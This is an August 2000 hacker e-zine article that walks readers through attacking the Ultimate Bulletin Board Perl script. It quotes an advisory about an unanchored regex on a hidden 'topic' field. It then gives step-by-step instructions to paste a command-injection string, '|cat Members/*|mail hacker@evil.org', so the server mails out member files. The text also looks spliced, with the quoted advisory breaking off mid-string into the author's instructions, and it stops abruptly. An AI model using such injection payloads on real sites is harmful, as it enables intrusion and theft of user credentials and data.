_________ SWAT MAGAZINE ISSUE THIRTY TWO AUGUST 2000 __________ / \___________________________________________/ \ / hacking UBB \ / SNaFu "MGD" \ ----------------------------------------------------------------------- www.themgd.co.uk I've read SWAT for along time but i've never written for them before so sorry if this isn't upto the usual high standard that the average SWAT article is but its my first attempt so gimme a break,I'm gonna write some more articles if i get round to it (infact i'm pretty damn sure i will get round to it cos i've been grounded for the next 6 month's). ok 'nuff of the shit lets get down to the 'sloit any self respecting hacker has heard of the wwwboard exploit well this one takes it alot further and hopefully with a bit of luck will get you r00t. The target is Ultimate Bullitain Board this is just like wwwboard but alot more sophisticated,it is a perl script that alot of respected sites use (including progenic). this is the file i got that told me about the exploit ----------------------------------------------------------------------- "Hello. Writing cgi scripts in perl is simple. It's also rather safe, providing authors follow very simple instructions. But they don't. Browsing some site, I found that their forums were based not on home- made scripts, but rather commercial software product. Hey, said I to myself, remember those story about pcweek hack ? They use commercial package photoads. Let's look what that Ultimate Bulletin Board by Infopop is. I grabbed freeware version from http://www.ultimatebb.com and after 10-minutes grepping found those lines: ubb_library.pl:901-902 if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) { open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile"); (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while writing it ? Girls ?) And the $ThreadFile takes its value directly from the hidden (hmm!) field `topic'. So when I filled the form with topic='012345.ubb|mail hacker@evil.com (if you try a diffrent site to the demonstration then the 000369.cgi bit will be different) once you have found this copy "|cat Members/*|mail hacker@evil.org" and paste it right after 000369.cgi so it looks like this (obviously substituting evil@hacker for your e-mail addy) ok save this and go back to the bit where you got the source code from look for a link sayin "want to register" on the left hand side once you have found the link right click it and "copy shortcut" it. Now go back into the source and find this line